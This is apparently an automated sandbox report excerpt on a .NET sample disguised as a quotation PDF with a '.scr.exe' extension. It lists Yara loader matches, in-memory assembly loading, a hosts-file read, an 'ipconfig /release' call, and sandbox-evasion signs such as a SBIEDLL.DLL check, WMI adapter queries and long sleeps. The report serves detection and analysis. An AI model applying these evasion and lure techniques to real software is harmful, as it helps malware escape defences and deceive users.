Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, fwzmQCK.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44767c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44c432d.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b60000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b60000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.383516213.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383893924.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383676188.0000000004476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383516213.0000000003462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe PID: 5436, type: MEMORYSTR

.NET source code contains potential unpacker

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, Definition.cs	.Net Code: MapRole System.AppDomain.Load(byte[])
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.45da880.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs	.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs	.Net Code: _0003 System.AppDomain.Load(byte[])
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs	.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.458a860.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5ba0000.16.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C0A9EA pushad ; iretd	0_2_05C0A9F9
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C0A300 pushad ; retf	0_2_05C0A301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A59BBA8 pushfd ; iretd	11_2_0A59BBA9

Source: initial sample

Static PE information: section name: .text entropy: 7.979516114599912

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 5504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5852	Thread sleep count: 1042 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599872s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5852	Thread sleep count: 8617 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -599047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597704s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597579s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597454s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -596079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595829s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595704s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595579s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595454s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -595079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752	Thread sleep time: -594954s >= -30000s	Jump to behavior
